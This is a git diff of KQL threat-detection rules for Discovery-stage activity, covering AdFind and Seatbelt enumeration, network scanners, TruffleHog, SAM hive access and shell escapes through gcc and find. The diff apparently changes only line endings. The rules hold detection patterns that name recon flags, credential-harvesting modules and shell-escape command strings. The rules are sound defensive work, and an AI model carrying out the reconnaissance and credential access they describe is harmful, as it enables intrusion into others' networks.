ProcessCommandLine contains "computer_pwdnotreqd" or ProcessCommandLine contains "objectcategory=" or ProcessCommandLine contains "-subnets -f" or ProcessCommandLine contains "name=\"Domain Admins\"" or ProcessCommandLine contains "-sc u:" or ProcessCommandLine contains "domainncs" or ProcessCommandLine contains "dompol" or ProcessCommandLine contains " oudmp " or ProcessCommandLine contains "subnetdmp" or ProcessCommandLine contains "gpodmp" or ProcessCommandLine contains "fspdmp" or ProcessCommandLine contains "users_noexpire" or ProcessCommandLine contains "computers_active" or ProcessCommandLine contains "computers_pwdnotreqd" \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_adidnsdump_execution.kql b/KQL/rules/Discovery/pua_adidnsdump_execution.kql index c8380722..7d6c2ec6 100644 --- a/KQL/rules/Discovery/pua_adidnsdump_execution.kql +++ b/KQL/rules/Discovery/pua_adidnsdump_execution.kql @@ -1,11 +1,11 @@ -// Title: PUA - Adidnsdump Execution -// Author: frack113 -// Date: 2022-01-01 -// Level: low -// Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, -// Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1018 - -DeviceProcessEvents +// Title: PUA - Adidnsdump Execution +// Author: frack113 +// Date: 2022-01-01 +// Level: low +// Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, +// Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1018 + +DeviceProcessEvents | where ProcessCommandLine contains "adidnsdump" and FolderPath endswith "\\python.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql b/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql index 26f2dee9..4a0403e9 100644 --- a/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql +++ b/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - Advanced IP Scanner Execution -// Author: Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy -// Date: 2020-05-12 -// Level: medium -// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1046, attack.t1135 -// False Positives: -// - Legitimate administrative use - -DeviceProcessEvents +// Title: PUA - Advanced IP Scanner Execution +// Author: Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy +// Date: 2020-05-12 +// Level: medium +// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046, attack.t1135 +// False Positives: +// - Legitimate administrative use + +DeviceProcessEvents | where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_ip_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_ip_scanner" or ProcessVersionInfoFileDescription contains "Advanced IP Scanner") \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql b/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql index 78716ab9..87166d63 100644 --- a/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql +++ b/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql @@ -1,13 +1,13 @@ -// Title: PUA - Advanced Port Scanner Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-12-18 -// Level: medium -// Description: Detects the use of Advanced Port Scanner. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1046, attack.t1135 -// False Positives: -// - Legitimate administrative use -// - Tools with similar commandline (very rare) - -DeviceProcessEvents +// Title: PUA - Advanced Port Scanner Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-18 +// Level: medium +// Description: Detects the use of Advanced Port Scanner. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046, attack.t1135 +// False Positives: +// - Legitimate administrative use +// - Tools with similar commandline (very rare) + +DeviceProcessEvents | where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_port_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_port_scanner" or ProcessVersionInfoFileDescription contains "Advanced Port Scanner") \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_crassus_execution.kql b/KQL/rules/Discovery/pua_crassus_execution.kql index bf5dfd90..9c3168fe 100644 --- a/KQL/rules/Discovery/pua_crassus_execution.kql +++ b/KQL/rules/Discovery/pua_crassus_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - Crassus Execution -// Author: pH-T (Nextron Systems) -// Date: 2023-04-17 -// Level: high -// Description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.reconnaissance, attack.t1590.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: PUA - Crassus Execution +// Author: pH-T (Nextron Systems) +// Date: 2023-04-17 +// Level: high +// Description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.reconnaissance, attack.t1590.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\Crassus.exe" or ProcessVersionInfoOriginalFileName =~ "Crassus.exe" or ProcessVersionInfoFileDescription contains "Crassus" \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql b/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql index b700d762..f0fbeaa1 100644 --- a/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql +++ b/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - Nmap/Zenmap Execution -// Author: frack113 -// Date: 2021-12-10 -// Level: medium -// Description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1046 -// False Positives: -// - Legitimate administrator activity - -DeviceProcessEvents +// Title: PUA - Nmap/Zenmap Execution +// Author: frack113 +// Date: 2021-12-10 +// Level: medium +// Description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate administrator activity + +DeviceProcessEvents | where (FolderPath endswith "\\nmap.exe" or FolderPath endswith "\\zennmap.exe") or (ProcessVersionInfoOriginalFileName in~ ("nmap.exe", "zennmap.exe")) \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_seatbelt_execution.kql b/KQL/rules/Discovery/pua_seatbelt_execution.kql index a439ff51..82d72f38 100644 --- a/KQL/rules/Discovery/pua_seatbelt_execution.kql +++ b/KQL/rules/Discovery/pua_seatbelt_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - Seatbelt Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-18 -// Level: high -// Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1526, attack.t1087, attack.t1083 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: PUA - Seatbelt Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-18 +// Level: high +// Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1526, attack.t1087, attack.t1083 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\Seatbelt.exe" or ProcessVersionInfoOriginalFileName =~ "Seatbelt.exe" or ProcessVersionInfoFileDescription =~ "Seatbelt" or (ProcessCommandLine contains " DpapiMasterKeys" or ProcessCommandLine contains " InterestingProcesses" or ProcessCommandLine contains " InterestingFiles" or ProcessCommandLine contains " CertificateThumbprints" or ProcessCommandLine contains " ChromiumBookmarks" or ProcessCommandLine contains " ChromiumHistory" or ProcessCommandLine contains " ChromiumPresence" or ProcessCommandLine contains " CloudCredentials" or ProcessCommandLine contains " CredEnum" or ProcessCommandLine contains " CredGuard" or ProcessCommandLine contains " FirefoxHistory" or ProcessCommandLine contains " ProcessCreationEvents")) or ((ProcessCommandLine contains " -group=misc" or ProcessCommandLine contains " -group=remote" or ProcessCommandLine contains " -group=chromium" or ProcessCommandLine contains " -group=slack" or ProcessCommandLine contains " -group=system" or ProcessCommandLine contains " -group=user" or ProcessCommandLine contains " -group=all") and ProcessCommandLine contains " -outputfile=") \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql b/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql index c4f77b5c..bff4da4a 100644 --- a/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql +++ b/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql @@ -1,13 +1,13 @@ -// Title: PUA - SoftPerfect Netscan Execution -// Author: @d4ns4n_ (Wuerth-Phoenix) -// Date: 2024-04-25 -// Level: medium -// Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks. -// It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1046 -// False Positives: -// - Legitimate administrator activity - -DeviceProcessEvents +// Title: PUA - SoftPerfect Netscan Execution +// Author: @d4ns4n_ (Wuerth-Phoenix) +// Date: 2024-04-25 +// Level: medium +// Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks. +// It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate administrator activity + +DeviceProcessEvents | where FolderPath endswith "\\netscan.exe" or ProcessVersionInfoProductName =~ "Network Scanner" or ProcessVersionInfoFileDescription =~ "Application for scanning networks" \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql b/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql index 99346fc1..469e6605 100644 --- a/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql +++ b/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql @@ -1,12 +1,12 @@ -// Title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE -// Author: frack113 -// Date: 2021-12-13 -// Level: high -// Description: Detects active directory enumeration activity using known AdFind CLI flags -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1087.002 -// False Positives: -// - Authorized administrative activity - -DeviceProcessEvents +// Title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE +// Author: frack113 +// Date: 2021-12-13 +// Level: high +// Description: Detects active directory enumeration activity using known AdFind CLI flags +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.002 +// False Positives: +// - Authorized administrative activity + +DeviceProcessEvents | where ProcessCommandLine contains "-sc admincountdmp" or ProcessCommandLine contains "-sc exchaddresses" or (ProcessCommandLine contains "lockoutduration" or ProcessCommandLine contains "lockoutthreshold" or ProcessCommandLine contains "lockoutobservationwindow" or ProcessCommandLine contains "maxpwdage" or ProcessCommandLine contains "minpwdage" or ProcessCommandLine contains "minpwdlength" or ProcessCommandLine contains "pwdhistorylength" or ProcessCommandLine contains "pwdproperties") \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_trufflehog_execution.kql b/KQL/rules/Discovery/pua_trufflehog_execution.kql index 4de2bd44..f5495cb2 100644 --- a/KQL/rules/Discovery/pua_trufflehog_execution.kql +++ b/KQL/rules/Discovery/pua_trufflehog_execution.kql @@ -1,14 +1,14 @@ -// Title: PUA - TruffleHog Execution -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-09-24 -// Level: medium -// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. -// While it is a legitimate tool, intended for use in CI pipelines and security assessments, -// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001 -// False Positives: -// - Legitimate use of TruffleHog by security teams or developers. - -DeviceProcessEvents +// Title: PUA - TruffleHog Execution +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-24 +// Level: medium +// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. +// While it is a legitimate tool, intended for use in CI pipelines and security assessments, +// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001 +// False Positives: +// - Legitimate use of TruffleHog by security teams or developers. + +DeviceProcessEvents | where FolderPath endswith "\\trufflehog.exe" or ((ProcessCommandLine contains " docker --image " or ProcessCommandLine contains " Git " or ProcessCommandLine contains " GitHub " or ProcessCommandLine contains " Jira " or ProcessCommandLine contains " Slack " or ProcessCommandLine contains " Confluence " or ProcessCommandLine contains " SharePoint " or ProcessCommandLine contains " s3 " or ProcessCommandLine contains " gcs ") and ProcessCommandLine contains " --results=verified") \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql b/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql index c1cfd9c1..719410cb 100644 --- a/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql +++ b/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql @@ -1,14 +1,14 @@ -// Title: PUA - TruffleHog Execution - Linux -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-09-24 -// Level: medium -// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. -// While it is a legitimate tool, intended for use in CI pipelines and security assessments, -// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001 -// False Positives: -// - Legitimate use of TruffleHog by security teams or developers. - -DeviceProcessEvents +// Title: PUA - TruffleHog Execution - Linux +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-24 +// Level: medium +// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. +// While it is a legitimate tool, intended for use in CI pipelines and security assessments, +// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001 +// False Positives: +// - Legitimate use of TruffleHog by security teams or developers. + +DeviceProcessEvents | where FolderPath endswith "/trufflehog" or ((ProcessCommandLine contains " docker --image " or ProcessCommandLine contains " Git " or ProcessCommandLine contains " GitHub " or ProcessCommandLine contains " Jira " or ProcessCommandLine contains " Slack " or ProcessCommandLine contains " Confluence " or ProcessCommandLine contains " SharePoint " or ProcessCommandLine contains " s3 " or ProcessCommandLine contains " gcs ") and ProcessCommandLine contains " --results=verified") \ No newline at end of file diff --git a/KQL/rules/Discovery/python_initiated_connection.kql b/KQL/rules/Discovery/python_initiated_connection.kql index e75ac528..bb3abc56 100644 --- a/KQL/rules/Discovery/python_initiated_connection.kql +++ b/KQL/rules/Discovery/python_initiated_connection.kql @@ -1,12 +1,12 @@ -// Title: Python Initiated Connection -// Author: frack113 -// Date: 2021-12-10 -// Level: medium -// Description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1046 -// False Positives: -// - Legitimate python scripts using the socket library or similar will trigger this. Apply additional filters and perform an initial baseline before deploying. - -DeviceNetworkEvents +// Title: Python Initiated Connection +// Author: frack113 +// Date: 2021-12-10 +// Level: medium +// Description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate python scripts using the socket library or similar will trigger this. Apply additional filters and perform an initial baseline before deploying. + +DeviceNetworkEvents | where (InitiatingProcessFolderPath contains "\\python" and InitiatingProcessFolderPath contains ".exe") and (not(((RemoteIP =~ "127.0.0.1" and LocalIP =~ "127.0.0.1") or (InitiatingProcessCommandLine contains "pip.exe" and InitiatingProcessCommandLine contains "install")))) and (not((((InitiatingProcessCommandLine contains ":\\ProgramData\\Anaconda3\\Scripts\\conda-script.py" and InitiatingProcessCommandLine contains "update") and InitiatingProcessParentFileName =~ "conda.exe") or (InitiatingProcessCommandLine contains "C:\\ProgramData\\Anaconda3\\Scripts\\jupyter-notebook-script.py" and InitiatingProcessParentFileName =~ "python.exe")))) \ No newline at end of file diff --git a/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql b/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql index eb4754c8..5ddcf479 100644 --- a/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql +++ b/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql @@ -1,11 +1,11 @@ -// Title: Recon Command Output Piped To Findstr.EXE -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2023-07-06 -// Level: medium -// Description: Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. -// Attackers often time use this technique to extract specific information they require in their reconnaissance phase. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1057 - -DeviceProcessEvents +// Title: Recon Command Output Piped To Findstr.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2023-07-06 +// Level: medium +// Description: Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. +// Attackers often time use this technique to extract specific information they require in their reconnaissance phase. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1057 + +DeviceProcessEvents | where ((ProcessCommandLine contains "ipconfig" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "net" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "netstat" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "ping" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "systeminfo" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "tasklist" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "whoami" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find")) and (not((ProcessCommandLine contains "cmd.exe /c TASKLIST /V |" and ProcessCommandLine contains "FIND /I" and ProcessCommandLine contains "\\xampp\\" and ProcessCommandLine contains "\\catalina_start.bat"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/renamed_whoami_execution.kql b/KQL/rules/Discovery/renamed_whoami_execution.kql index d4781e91..e869e646 100644 --- a/KQL/rules/Discovery/renamed_whoami_execution.kql +++ b/KQL/rules/Discovery/renamed_whoami_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed Whoami Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2021-08-12 -// Level: critical -// Description: Detects the execution of whoami that has been renamed to a different name to avoid detection -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1033, car.2016-03-001 - -DeviceProcessEvents +// Title: Renamed Whoami Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-12 +// Level: critical +// Description: Detects the execution of whoami that has been renamed to a different name to avoid detection +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, car.2016-03-001 + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "whoami.exe" and (not(FolderPath endswith "\\whoami.exe")) \ No newline at end of file diff --git a/KQL/rules/Discovery/sam_registry_hive_handle_request.kql b/KQL/rules/Discovery/sam_registry_hive_handle_request.kql index 8ee8f789..42193b52 100644 --- a/KQL/rules/Discovery/sam_registry_hive_handle_request.kql +++ b/KQL/rules/Discovery/sam_registry_hive_handle_request.kql @@ -1,10 +1,10 @@ -// Title: SAM Registry Hive Handle Request -// Author: Roberto Rodriguez @Cyb3rWard0g -// Date: 2019-08-12 -// Level: high -// Description: Detects handles requested to SAM registry hive -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1012, attack.credential-access, attack.t1552.002 - -DeviceRegistryEvents +// Title: SAM Registry Hive Handle Request +// Author: Roberto Rodriguez @Cyb3rWard0g +// Date: 2019-08-12 +// Level: high +// Description: Detects handles requested to SAM registry hive +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1012, attack.credential-access, attack.t1552.002 + +DeviceRegistryEvents | where RegistryKey endswith "\\SAM" \ No newline at end of file diff --git a/KQL/rules/Discovery/security_software_discovery_linux.kql b/KQL/rules/Discovery/security_software_discovery_linux.kql index d85befda..902ae8e1 100644 --- a/KQL/rules/Discovery/security_software_discovery_linux.kql +++ b/KQL/rules/Discovery/security_software_discovery_linux.kql @@ -1,12 +1,12 @@ -// Title: Security Software Discovery - Linux -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2020-10-19 -// Level: low -// Description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1518.001 -// False Positives: -// - Legitimate activities - -DeviceProcessEvents +// Title: Security Software Discovery - Linux +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: low +// Description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518.001 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents | where (ProcessCommandLine contains "nessusd" or ProcessCommandLine contains "td-agent" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "osqueryd" or ProcessCommandLine contains "cbagentd" or ProcessCommandLine contains "falcond") and (FolderPath endswith "/grep" or FolderPath endswith "/egrep") \ No newline at end of file diff --git a/KQL/rules/Discovery/security_software_discovery_macos.kql b/KQL/rules/Discovery/security_software_discovery_macos.kql index 26007344..31c19c30 100644 --- a/KQL/rules/Discovery/security_software_discovery_macos.kql +++ b/KQL/rules/Discovery/security_software_discovery_macos.kql @@ -1,12 +1,12 @@ -// Title: Security Software Discovery - MacOs -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2020-10-19 -// Level: medium -// Description: Detects usage of system utilities (only grep for now) to discover security software discovery -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1518.001 -// False Positives: -// - Legitimate activities - -DeviceProcessEvents +// Title: Security Software Discovery - MacOs +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: medium +// Description: Detects usage of system utilities (only grep for now) to discover security software discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518.001 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents | where FolderPath =~ "/usr/bin/grep" and ((ProcessCommandLine contains "nessusd" or ProcessCommandLine contains "santad" or ProcessCommandLine contains "CbDefense" or ProcessCommandLine contains "falcond" or ProcessCommandLine contains "td-agent" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "osqueryd" or ProcessCommandLine contains "BlockBlock" or ProcessCommandLine contains "LuLu") or (ProcessCommandLine contains "Little" and ProcessCommandLine contains "Snitch")) \ No newline at end of file diff --git a/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql b/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql index 127e33b3..260b5bc3 100644 --- a/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql +++ b/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql @@ -1,11 +1,11 @@ -// Title: Security Tools Keyword Lookup Via Findstr.EXE -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2023-10-20 -// Level: medium -// Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. -// This detection focuses on the keywords that the attacker might use as a filter. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1518.001 - -DeviceProcessEvents +// Title: Security Tools Keyword Lookup Via Findstr.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2023-10-20 +// Level: medium +// Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. +// This detection focuses on the keywords that the attacker might use as a filter. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518.001 + +DeviceProcessEvents | where (ProcessCommandLine endswith " avira" or ProcessCommandLine endswith " avira\"" or ProcessCommandLine endswith " cb" or ProcessCommandLine endswith " cb\"" or ProcessCommandLine endswith " cylance" or ProcessCommandLine endswith " cylance\"" or ProcessCommandLine endswith " defender" or ProcessCommandLine endswith " defender\"" or ProcessCommandLine endswith " kaspersky" or ProcessCommandLine endswith " kaspersky\"" or ProcessCommandLine endswith " kes" or ProcessCommandLine endswith " kes\"" or ProcessCommandLine endswith " mc" or ProcessCommandLine endswith " mc\"" or ProcessCommandLine endswith " sec" or ProcessCommandLine endswith " sec\"" or ProcessCommandLine endswith " sentinel" or ProcessCommandLine endswith " sentinel\"" or ProcessCommandLine endswith " symantec" or ProcessCommandLine endswith " symantec\"" or ProcessCommandLine endswith " virus" or ProcessCommandLine endswith " virus\"") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql b/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql index 639d1101..f7b92e5b 100644 --- a/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql +++ b/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql @@ -1,12 +1,12 @@ -// Title: Share And Session Enumeration Using Net.EXE -// Author: Endgame, JHasenbusch (ported for oscd.community) -// Date: 2018-10-30 -// Level: low -// Description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1018 -// False Positives: -// - Legitimate use of net.exe utility by legitimate user - -DeviceProcessEvents +// Title: Share And Session Enumeration Using Net.EXE +// Author: Endgame, JHasenbusch (ported for oscd.community) +// Date: 2018-10-30 +// Level: low +// Description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1018 +// False Positives: +// - Legitimate use of net.exe utility by legitimate user + +DeviceProcessEvents | where (ProcessCommandLine contains "view" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine contains "\\\\")) \ No newline at end of file diff --git a/KQL/rules/Discovery/shell_execution_gcc_linux.kql b/KQL/rules/Discovery/shell_execution_gcc_linux.kql index e3fb57c5..0c36903b 100644 --- a/KQL/rules/Discovery/shell_execution_gcc_linux.kql +++ b/KQL/rules/Discovery/shell_execution_gcc_linux.kql @@ -1,10 +1,10 @@ -// Title: Shell Execution GCC - Linux -// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) -// Date: 2024-09-02 -// Level: high -// Description: Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1083 - -DeviceProcessEvents +// Title: Shell Execution GCC - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents | where (ProcessCommandLine contains "/bin/bash,-s" or ProcessCommandLine contains "/bin/dash,-s" or ProcessCommandLine contains "/bin/fish,-s" or ProcessCommandLine contains "/bin/sh,-s" or ProcessCommandLine contains "/bin/zsh,-s") and (ProcessCommandLine contains "-wrapper" and (FolderPath endswith "/c89" or FolderPath endswith "/c99" or FolderPath endswith "/gcc")) \ No newline at end of file diff --git a/KQL/rules/Discovery/shell_execution_via_find_linux.kql b/KQL/rules/Discovery/shell_execution_via_find_linux.kql index c35bbc2d..97c5fc00 100644 --- a/KQL/rules/Discovery/shell_execution_via_find_linux.kql +++ b/KQL/rules/Discovery/shell_execution_via_find_linux.kql @@ -1,10 +1,10 @@ -// Title: Shell Execution via Find - Linux -// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) -// Date: 2024-09-02 -// Level: high -// Description: Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1083 - -DeviceProcessEvents +// Title: Shell Execution via Find - Linux +// Author: Li Ling, Andy 